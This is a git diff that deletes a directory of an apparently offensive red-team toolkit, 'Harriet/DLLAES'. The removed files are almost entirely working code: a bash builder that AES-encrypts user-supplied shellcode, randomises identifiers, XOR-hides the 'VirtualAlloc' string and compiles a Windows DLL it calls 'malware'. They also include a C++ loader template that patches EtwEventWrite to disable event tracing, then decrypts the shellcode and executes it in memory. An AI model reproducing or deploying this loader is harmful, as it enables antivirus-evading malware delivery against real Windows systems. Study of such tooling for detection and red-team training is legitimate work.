Delete Harriet/DLLAES directory

Harriet/DLLAES/DLLAes.sh

@@ -1,124 +0,0 @@
-#!/bin/bash
-
-# Color variables
-red='\033[0;31m'
-green='\033[0;32m'
-yellow='\033[0;33m'
-blue='\033[0;34m'
-magenta='\033[0;35m'
-cyan='\033[0;36m'
-# Clear the color after that
-clear='\033[0m'
-cat << "EOF"
-  ___   _____ _____   _____                            _           _  ______ _      _     
- / _ \ |  ___/  ___| |  ___|                          | |         | | |  _  \ |    | |    
-/ /_\ \| |__ \ `--.  | |__ _ __   ___ _ __ _   _ _ __ | |_ ___  __| | | | | | |    | |    
-|  _  ||  __| `--. \ |  __| '_ \ / __| '__| | | | '_ \| __/ _ \/ _` | | | | | |    | |    
-| | | || |___/\__/ / | |__| | | | (__| |  | |_| | |_) | ||  __/ (_| | | |/ /| |____| |____
-\_| |_/\____/\____/  \____/_| |_|\___|_|   \__, | .__/ \__\___|\__,_| |___/ \_____/\_____/
-                                            __/ | |                                       
-                                           |___/|_|                                       
-
-EOF
-
-echo -e ${green}"Enter The Path To Your Shellcode File. ex: /home/user/Downloads/shellcode.bin"${clear}
-echo ""
-read Shellcode
-echo ""
-echo -e ${green}"Name Your Malware! ex: malware.exe"${clear}
-echo ""
-read MALWARE
-echo ""
-cp Harriet/DLLAES/xor.py Harriet/DLLAES/Resources/xor.py
-cp Harriet/DLLAES/template.cpp Harriet/DLLAES/Resources/template.cpp
-echo -e ${yellow}"+++Encrypting Payload+++" ${clear}
-echo ""
-sleep 2
-python3 Harriet/DLLAES/Resources/aesencrypt.py $Shellcode > shell.txt
-echo -e ${yellow}"***Encryption Completed***"${clear}
-echo ""
-cp shell.txt shell2.txt
-#Generate AES Key
-keys=$(cat "shell2.txt")
-cut -d 'p' -f1 shell2.txt > shell3.txt
-keys=$(cat shell3.txt)
-keysnow=${keys#*=}
-sed -i "s/KEYVALUE/$keysnow/g" Harriet/DLLAES/Resources/template.cpp
-
-#Generate AES Payload
-payload=$(cat "shell.txt")
-payloadnow=${payload#*;}
-payloadtoday=${payloadnow#*=}
-echo $payloadtoday > shell5.txt
-perl -pe 's/PAYVAL/`cat shell5.txt`/ge' -i Harriet/DLLAES/Resources/template.cpp
-sleep 2
-
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-8} | head -n 1 > shell.txt
-Random1=$(cat shell.txt)
-sed -i "s/Random1/$Random1/g" Harriet/DLLAES/Resources/template.cpp
-
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
-Random2=$(cat shell.txt)
-sed -i "s/Random2/$Random2/g" Harriet/DLLAES/Resources/template.cpp
-
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-19} | head -n 1 > shell.txt
-Random3=$(cat shell.txt)
-sed -i "s/Random3/$Random3/g" Harriet/DLLAES/Resources/template.cpp
-
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-16} | head -n 1 > shell.txt
-Random4=$(cat shell.txt)
-sed -i "s/Random4/$Random4/g" Harriet/DLLAES/Resources/template.cpp
-
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-14} | head -n 1 > shell.txt
-Random5=$(cat shell.txt)
-sed -i "s/Random5/$Random5/g" Harriet/DLLAES/Resources/template.cpp
-
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-5} | head -n 1 > shell.txt
-Random6=$(cat shell.txt)
-sed -i "s/Random6/$Random6/g" Harriet/DLLAES/Resources/template.cpp
-
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-4} | head -n 1 > shell.txt
-Random7=$(cat shell.txt)
-sed -i "s/Random7/$Random7/g" Harriet/DLLAES/Resources/template.cpp
-
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-2} | head -n 1 > shell.txt
-Random8=$(cat shell.txt)
-sed -i "s/Random8/$Random8/g" Harriet/DLLAES/Resources/template.cpp
-
-#VIRTUALALLOC VARIABLE NAME
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
-Random9=$(cat shell.txt)
-sed -i "s/Random9/$Random9/g" Harriet/DLLAES/Resources/template.cpp
-
-#XOR FUNCTION VARIABLE NAME
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
-RandomA=$(cat shell.txt)
-sed -i "s/RandomA/$RandomA/g" Harriet/DLLAES/Resources/template.cpp
-
-#XOR KEY VALUE
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-15} | head -n 1 > shell.txt
-XOR_KEY=$(cat shell.txt)
-sed -i "s/XOR_KEY/$XOR_KEY/g" Harriet/DLLAES/Resources/template.cpp
-sed -i "s/XOR_KEY/$XOR_KEY/g" Harriet/DLLAES/Resources/xor.py
-
-#XOR KEY VARIABLE
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-17} | head -n 1 > shell.txt
-XOR_VARIABLE=$(cat shell.txt)
-sed -i "s/XOR_VARIABLE/$XOR_VARIABLE/g" Harriet/DLLAES/Resources/template.cpp
-rm shell.txt
-
-#VIRTUALALLOC - XOR String
-echo VirtualAlloc > virt.txt
-python3 Harriet/DLLAES/Resources/xor.py virt.txt > virtalloc.txt
-virt=$(cat virtalloc.txt)
-virt2="${virt::-8}" 
-sed -i "s/VIRALO/$virt2/g" Harriet/DLLAES/Resources/template.cpp 
-rm virt*
-
-echo -e ${yellow}"+++Compiling Malware+++"${clear}
-x86_64-w64-mingw32-g++ -shared -o $MALWARE Harriet/DLLAES/Resources/template.cpp -fpermissive -Wno-narrowing >/dev/null 2>&1
-echo ""
-sleep 2
-rm shell*
-echo -e ${yellow}"***Malware Compiled***"${clear}
-echo ""

Harriet/DLLAES/Resources/aesencrypt.py

@@ -1,26 +0,0 @@
-# Red Team Operator course code template
-# payload encryption with AES
-# 
-# author: reenz0h (twitter: @SEKTOR7net)
-
-import sys
-from base64 import b64encode
-from Crypto.Cipher import AES
-from Crypto.Util.Padding import pad
-from Crypto.Random import get_random_bytes
-import hashlib
-
-KEY = get_random_bytes(16)
-iv = 16 * b'\x00'
-cipher = AES.new(hashlib.sha256(KEY).digest(), AES.MODE_CBC, iv)
-
-try:
-    plaintext = open(sys.argv[1], "rb").read()
-except:
-    print("File argument needed! %s <raw payload file>" % sys.argv[0])
-    sys.exit()
-
-ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
-
-print('AESkey[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in KEY) + ' };')
-print('payload[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')

Harriet/DLLAES/Resources/xor.py

@@ -1,32 +0,0 @@
-# Red Team Operator course code template
-# payload encryption with XOR
-#
-# author: reenz0h (twitter: @sektor7net)
-
-import sys
-
-KEY = "YnNMojLDpktrJDj"
-
-def xor(data, key):
-	l = len(key)
-	output_str = ""
-
-	for i in range(len(data)):
-		current = data[i]
-		current_key = key[i%len(key)]
-		output_str += chr(ord(current) ^ ord(current_key))
-	
-	return output_str
-
-def printC(ciphertext):
-	print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };')
-
-try:
-    plaintext = open(sys.argv[1], "r").read()
-except:
-    print("File argument needed! %s <raw payload file>" % sys.argv[0])
-    sys.exit()
-
-ciphertext = xor(plaintext, KEY)
-
-printC(ciphertext)

Harriet/DLLAES/template.cpp

@@ -1,110 +0,0 @@
-#include <windows.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <wincrypt.h>
-#pragma comment (lib, "crypt32.lib")
-#pragma comment (lib, "advapi32")
-#include <psapi.h>
-#include <string.h>
-#include <tlhelp32.h>
-
-LPVOID (WINAPI * Virt_Alloc)(  LPVOID lpAddress, SIZE_T dwSize, DWORD  flAllocationType, DWORD  flProtect);
-
-char XOR_VARIABLE []= "XOR_KEY";
-
-unsigned char Random9 []= VIRALO}; 
-
-
-int Random1(char * different, unsigned int different_len, char * key, size_t keylen) {
-        HCRYPTPROV hProv;
-        HCRYPTHASH hHash;
-        HCRYPTKEY hKey;
-
-        if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)){
-                return -1;
-        }
-        if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)){
-                return -1;
-        }
-        if (!CryptHashData(hHash, (BYTE*)key, (DWORD)keylen, 0)){
-                return -1;              
-        }
-        if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0,&hKey)){
-                return -1;
-        }
-        
-        if (!CryptDecrypt(hKey, (HCRYPTHASH) NULL, 0, 0, different, &different_len)){
-                return -1;
-        }
-        
-        CryptReleaseContext(hProv, 0);
-        CryptDestroyHash(hHash);
-        CryptDestroyKey(hKey);
-        
-        return 0;
-}
-
-
-void RandomA(char * tada, int tada_len, char * XOR_VARIABLE, size_t XOR_VARIABLE_len) {
-        int r;
-        r = 0;
-        for (int i = 0; i < tada_len; i++) {
-                if (r == XOR_VARIABLE_len - 1) r = 0;
-
-                tada[i] = tada[i] ^ XOR_VARIABLE[r];
-                r++;
-        }
-}
-
-int main(void) {
-	
-	void * Random6_mem;
-	BOOL Random8;
-	HANDLE th;
-        DWORD oldprotect = 0;
-	
-	
-	char Random2[] = KEYVALUE
-	unsigned char Random3[] = PAYVAL
-	unsigned int Random7_len = sizeof(Random3);
-	
-	int pido = 0;
-        HANDLE hProc = NULL;	
-	
-	void * addr = GetProcAddress(GetModuleHandle("ntdll.dll"), "EtwEventWrite");
-        VirtualProtect(addr, 4096, PAGE_EXECUTE_READWRITE, &oldprotect);
-
-        #ifdef _WIN64
-        memcpy(addr, "\x48\x33\xc0\xc3", 4);            
-        #else
-        memcpy(addr, "\x33\xc0\xc2\x14\x00", 5);                
-        #endif  
-
-        VirtualProtect(addr, 4096, oldprotect, &oldprotect);
-	
-	strrev(Random3);
-	FreeConsole();
-	strrev(Random3);
-
-	RandomA((char *) Random9, sizeof (Random9), XOR_VARIABLE, sizeof(XOR_VARIABLE));
-        Virt_Alloc= GetProcAddress(GetModuleHandle("kernel32.dll"), Random9);
-
-	Random6_mem = Virt_Alloc(0, Random7_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
-
-	Random1((char *) Random3, Random7_len, Random2, sizeof(Random2));
-		
-
-	RtlMoveMemory(Random6_mem, Random3, Random7_len);
-	
-
-	Random8 = VirtualProtect(Random6_mem, Random7_len, PAGE_EXECUTE_READ, &oldprotect);
-
-	if ( Random8 != 0 ) {
-			th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) Random6_mem, 0, 0, 0);
-			WaitForSingleObject(th, -1);
-	}
-	
-	return 0;
-}
-	

Harriet/DLLAES/xor.py

@@ -1,32 +0,0 @@
-# Red Team Operator course code template
-# payload encryption with XOR
-#
-# author: reenz0h (twitter: @sektor7net)
-
-import sys
-
-KEY = "XOR_KEY"
-
-def xor(data, key):
-	l = len(key)
-	output_str = ""
-
-	for i in range(len(data)):
-		current = data[i]
-		current_key = key[i%len(key)]
-		output_str += chr(ord(current) ^ ord(current_key))
-	
-	return output_str
-
-def printC(ciphertext):
-	print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };')
-
-try:
-    plaintext = open(sys.argv[1], "r").read()
-except:
-    print("File argument needed! %s <raw payload file>" % sys.argv[0])
-    sys.exit()
-
-ciphertext = xor(plaintext, KEY)
-
-printC(ciphertext)